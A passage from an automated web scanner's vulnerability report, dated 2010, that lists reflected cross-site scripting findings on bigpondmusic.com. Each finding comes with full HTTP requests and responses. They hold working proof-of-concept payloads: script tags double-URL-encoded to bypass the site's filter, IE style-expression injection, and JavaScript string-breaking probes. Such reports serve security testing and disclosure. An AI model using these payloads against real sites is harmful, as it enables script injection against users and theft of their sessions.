HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123472


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Angus &amp; Julia Stone - Do
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/angus-julia-stone/down-the-way?94180"style="x:expression(alert(1))"cea24253dac=1" />
...[SNIP]...

2.27. http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a58b'%3b1ecb978a1bf was submitted in the REST URL parameter 1. This input was echoed as 4a58b';1ecb978a1bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album4a58b'%3b1ecb978a1bf/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album4a58b';1ecb978a1bf';
   s.prop4 = 'bon-jovi';
   s.prop5 = 'bon-jovi-greatest-hits-the-ultimate-collection';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1
...[SNIP]...

2.28. http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30492%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85c7280a885 was submitted in the REST URL parameter 1. This input was echoed as 30492"><script>alert(1)</script>85c7280a885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album30492%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85c7280a885/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88040


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album30492"><script>alert(1)</script>85c7280a885/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection" />
...[SNIP]...

2.29. http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1867"style%3d"x%3aexpression(alert(1))"928c28e0869 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1867"style="x:expression(alert(1))"928c28e0869 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection?f1867"style%3d"x%3aexpression(alert(1))"928c28e0869=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 152745


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bon Jovi - Bon Jovi Greatest
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection?f1867"style="x:expression(alert(1))"928c28e0869=1" />
...[SNIP]...

2.30. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bruno-mars/just-the-way-you-are

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd04fe20e3c was submitted in the REST URL parameter 1. This input was echoed as fd217"><script>alert(1)</script>fd04fe20e3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumfd217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd04fe20e3c/bruno-mars/just-the-way-you-are HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88047


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumfd217"><script>alert(1)</script>fd04fe20e3c/bruno-mars/just-the-way-you-are" />
...[SNIP]...

2.31. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/bruno-mars/just-the-way-you-are

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d12f4'%3bae96ba96e95 was submitted in the REST URL parameter 1. This input was echoed as d12f4';ae96ba96e95 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumd12f4'%3bae96ba96e95/bruno-mars/just-the-way-you-are HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87936


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumd12f4';ae96ba96e95';
   s.prop4 = 'bruno-mars';
   s.prop5 = 'just-the-way-you-are';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s
...[SNIP]...

2.32. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bruno-mars/just-the-way-you-are

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fcf3"style%3d"x%3aexpression(alert(1))"a271f02fb84 was submitted in the h parameter. This input was echoed as 4fcf3"style="x:expression(alert(1))"a271f02fb84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/bruno-mars/just-the-way-you-are?h=7161732784fcf3"style%3d"x%3aexpression(alert(1))"a271f02fb84 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 100921


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bruno Mars - Just The Way Yo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are?h=7161732784fcf3"style="x:expression(alert(1))"a271f02fb84" />
...[SNIP]...

2.33. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bruno-mars/just-the-way-you-are

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b916"style%3d"x%3aexpression(alert(1))"908c6cd8987 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b916"style="x:expression(alert(1))"908c6cd8987 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/bruno-mars/just-the-way-you-are?2b916"style%3d"x%3aexpression(alert(1))"908c6cd8987=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 100834


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bruno Mars - Just The Way Yo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are?2b916"style="x:expression(alert(1))"908c6cd8987=1" />
...[SNIP]...

2.34. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/cheryl-cole/promise-this2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98124%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a41ace4660 was submitted in the REST URL parameter 1. This input was echoed as 98124"><script>alert(1)</script>9a41ace4660 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album98124%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a41ace4660/cheryl-cole/promise-this2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88229


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album98124"><script>alert(1)</script>9a41ace4660/cheryl-cole/promise-this2" />
...[SNIP]...

2.35. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/cheryl-cole/promise-this2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ea10'%3b746216d7018 was submitted in the REST URL parameter 1. This input was echoed as 8ea10';746216d7018 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album8ea10'%3b746216d7018/cheryl-cole/promise-this2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88527


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album8ea10';746216d7018';
   s.prop4 = 'cheryl-cole';
   s.prop5 = 'promise-this2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3
...[SNIP]...

2.36. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/cheryl-cole/promise-this2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36267"style%3d"x%3aexpression(alert(1))"89a1f9e1cf8 was submitted in the h parameter. This input was echoed as 36267"style="x:expression(alert(1))"89a1f9e1cf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/cheryl-cole/promise-this2?h=76639449836267"style%3d"x%3aexpression(alert(1))"89a1f9e1cf8 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111361


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Cheryl Cole - Promise This -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/cheryl-cole/promise-this2?h=76639449836267"style="x:expression(alert(1))"89a1f9e1cf8" />
...[SNIP]...

2.37. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/cheryl-cole/promise-this2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9888f"style%3d"x%3aexpression(alert(1))"97f64925c9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9888f"style="x:expression(alert(1))"97f64925c9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/cheryl-cole/promise-this2?9888f"style%3d"x%3aexpression(alert(1))"97f64925c9b=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:24:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111424


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Cheryl Cole - Promise This -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/cheryl-cole/promise-this2?9888f"style="x:expression(alert(1))"97f64925c9b=1" />
...[SNIP]...

2.38. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/crowded-house/the-very-very-best-of-crowded-house

Issue detail

